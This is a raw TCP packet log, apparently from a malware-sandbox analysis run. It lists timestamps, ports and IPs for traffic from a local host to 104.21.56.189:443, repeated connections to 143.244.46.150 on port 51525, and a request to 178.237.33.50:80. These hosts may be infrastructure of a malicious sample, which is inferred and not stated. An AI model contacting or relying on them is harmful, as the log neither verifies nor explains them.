Oct 22, 2024 09:40:36.810470104 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.810517073 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.810581923 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.810630083 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.810684919 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.810734034 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.926496983 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.926594019 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.926618099 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.926660061 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.927819967 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.928347111 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.928353071 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.928400993 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.928924084 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.928977013 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.929012060 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.929054976 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.929091930 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.929136038 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.929491997 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.929552078 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.929603100 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.929661989 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:36.929702997 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:36.929749012 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:37.044348001 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:37.044414997 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:37.045121908 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:37.045180082 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:37.045537949 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:37.045587063 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:37.045599937 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:37.045655012 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:37.091645956 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:37.091702938 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:37.162862062 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:37.162966013 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:37.163639069 CEST  443          49846      104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:37.163710117 CEST  49846        443        192.168.2.6    104.21.56.189
Oct 22, 2024 09:40:37.163736105 CEST  443          49846      104.21.56.189  192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.163789988 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.209321976 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.209393978 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.279505014 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.279575109 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.280581951 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.280643940 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.280699015 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.280750036 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.281354904 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.281415939 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.327028990 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.327105045 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.397984028 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.398072004 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.398344040 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.398405075 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.398921967 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.398988008 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.444799900 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.444873095 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.444907904 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.444963932 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.515278101 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.515362024 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.516539097 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.516604900 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.516633987 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.516694069 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.562870026 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.562939882 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.632929087 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.633003950 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.633919001 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.633982897 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.634708881 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.634785891 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.634854078 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.634907007 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.680241108 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.680304050 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.727966070 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.728063107 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.751909971 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.751998901 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.752024889 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.752095938 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.752578020 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.752645969 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.797709942 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.797795057 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.845526934 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.845616102 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.868566036 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.868644953 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.869404078 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.869474888 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.869568110 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.869641066 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.870374918 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.870436907 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.963150978 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.963253021 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.963277102 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.963309050 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.963356972 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.963426113 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.987180948 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.987198114 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.987226009 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.987263918 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.987294912 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:37.987308979 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:37.987360954 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.104388952 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.104419947 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.104487896 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.104520082 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.104540110 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.104650021 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.154984951 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.155064106 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.155102015 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.155112982 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.155139923 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.155158043 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.222371101 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.222448111 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.222464085 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.222472906 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.222503901 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.222523928 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.316055059 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.316086054 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.316220045 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.316220045 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.316252947 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.316309929 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.340552092 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.340615034 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.340631008 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.340662003 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.340683937 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.340709925 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.457541943 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.457612991 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.457649946 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.457679987 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.457699060 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.457722902 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.507829905 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.507865906 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.507998943 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.507998943 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.508029938 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.508074999 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.575686932 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.575747967 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.575794935 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.575850964 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.575869083 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.576014996 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.626169920 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.626240015 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.626276970 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.626287937 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.626324892 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.626348019 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.693239927 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.693272114 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.693315029 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.693324089 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.693353891 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.693365097 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.743623972 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.743695974 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.743730068 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.743752003 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.743768930 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.743798971 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.810981989 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.811012030 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.811058044 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.811077118 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.811093092 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.811115980 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.861699104 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.861769915 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.861800909 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.861831903 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.861854076 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.861910105 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.928294897 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.928324938 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.928388119 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.928422928 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.928442955 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.928468943 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.979160070 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.979228020 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.979374886 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:38.979408026 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:38.979461908 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.045546055 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:39.045614004 CEST44349846104.21.56.189192.168.2.6
                                                                                                  Oct 22, 2024 09:40:39.045727968 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.045727968 CEST49846443192.168.2.6104.21.56.189
                                                                                                  Oct 22, 2024 09:40:39.045761108 CEST44349846104.21.56.189192.168.2.6
Oct 22, 2024 09:40:39.045811892 CEST  49846  443  192.168.2.6  104.21.56.189
Oct 22, 2024 09:40:39.045849085 CEST  443  49846  104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:39.046003103 CEST  443  49846  104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:39.046035051 CEST  49846  443  192.168.2.6  104.21.56.189
Oct 22, 2024 09:40:39.046035051 CEST  49846  443  192.168.2.6  104.21.56.189
Oct 22, 2024 09:40:39.046071053 CEST  443  49846  104.21.56.189  192.168.2.6
Oct 22, 2024 09:40:39.046102047 CEST  49846  443  192.168.2.6  104.21.56.189
Oct 22, 2024 09:40:39.046127081 CEST  49846  443  192.168.2.6  104.21.56.189
Oct 22, 2024 09:40:41.199649096 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:41.205008030 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:41.205089092 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:41.209614992 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:41.214958906 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:42.235986948 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:42.309015989 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:42.446870089 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:42.459894896 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:42.465276957 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:42.465436935 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:42.470824003 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:42.999722958 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:43.002250910 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:43.010740042 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:43.019732952 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:43.022878885 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:43.028146029 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:43.028214931 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:43.031433105 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:43.035705090 CEST  49893  80  192.168.2.6  178.237.33.50
Oct 22, 2024 09:40:43.036686897 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:43.041032076 CEST  80  49893  178.237.33.50  192.168.2.6
Oct 22, 2024 09:40:43.041095972 CEST  49893  80  192.168.2.6  178.237.33.50
Oct 22, 2024 09:40:43.041161060 CEST  49893  80  192.168.2.6  178.237.33.50
Oct 22, 2024 09:40:43.046680927 CEST  80  49893  178.237.33.50  192.168.2.6
Oct 22, 2024 09:40:43.105789900 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:43.893595934 CEST  80  49893  178.237.33.50  192.168.2.6
Oct 22, 2024 09:40:43.893685102 CEST  49893  80  192.168.2.6  178.237.33.50
Oct 22, 2024 09:40:43.917139053 CEST  49881  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:43.965826035 CEST  51525  49881  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.046032906 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.230803967 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.256479979 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.261075974 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.266418934 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.266585112 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.271913052 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.608170033 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.608218908 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.608232021 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.608246088 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.608261108 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.608288050 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.608294010 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.608318090 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.608347893 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.608433962 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.608549118 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.610383987 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.819250107 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.819278955 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.819334030 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.819338083 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.819434881 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.819447994 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.819478989 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.819785118 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.819854975 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.819868088 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.819899082 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.819922924 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.820269108 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.820322990 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.820339918 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.820370913 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:44.820652962 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.820971012 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:44.821026087 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.017276049 CEST  80  49893  178.237.33.50  192.168.2.6
Oct 22, 2024 09:40:45.018394947 CEST  49893  80  192.168.2.6  178.237.33.50
Oct 22, 2024 09:40:45.030318022 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.030358076 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.030412912 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.030436993 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.030452967 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.030715942 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.030740023 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.030755043 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.030755997 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.030788898 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.030812025 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.030850887 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.031310081 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.031368971 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.031384945 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.031419039 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.031431913 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.031861067 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.031903028 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.031929016 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.031944990 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.031960011 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.031964064 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.032480955 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.032521009 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.032552004 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.032565117 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.032603025 CEST  49892  51525  192.168.2.6  143.244.46.150
Oct 22, 2024 09:40:45.149620056 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.149645090 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.149660110 CEST  51525  49892  143.244.46.150  192.168.2.6
Oct 22, 2024 09:40:45.149676085 CEST  51525  49892  143.244.46.150  192.168.2.6
